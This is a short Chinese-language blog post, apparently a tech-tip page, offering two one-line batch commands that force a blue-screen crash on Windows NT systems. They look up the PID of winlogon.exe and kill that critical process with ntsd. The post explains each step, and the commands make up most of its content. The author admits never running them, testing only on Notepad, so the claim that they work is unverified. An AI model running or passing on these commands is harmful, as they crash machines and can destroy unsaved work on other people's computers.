一句话,欣赏蓝屏!

开门见山,一句批处理,可以导致蓝屏。代码如下:
复制内容到剪贴板代码:
@wmic process where name="winlogon.exe" get processid|find "processid" /i /v>1&&for /f %%i in (1) do ntsd /c q /p %%i&&del 1
或者
复制内容到剪贴板代码:
@tasklist /fi "imagename eq winlogon.exe"|find "winlogon.exe">1&&for /f "tokens=2" %%i in (1) do ntsd /c q /p %%i&&del 1
编写思路:
1、在WinNT系统下,关闭winlogon.exe进程会导致蓝屏。(但winlogon.exe是系统关键进程,用taskkill不能关闭。于是有下一步。)
2、ntsd /c q /p pid 可以关闭包括系统关键进程在内的大部分进程。(该程序接受的参数只能是PID,需要另外获取。于是有下一步。)
3、用wmic或taskkill都可以获得winlogon.exe的PID。(用find和for可以筛选出PID来。最后整理细务。终结。)

总结:
这个只能用于NT内核的Windows系统。并且我没有试过,只用'关闭记事本'实验来检查效果。
不过,推想应该是正确的。因为以前试过用ntsd关闭winlogon.exe导致蓝屏了。

点赞 (0)

发表评论

电子邮件地址不会被公开。 必填项已用*标注

This site uses Akismet to reduce spam. Learn how your comment data is processed.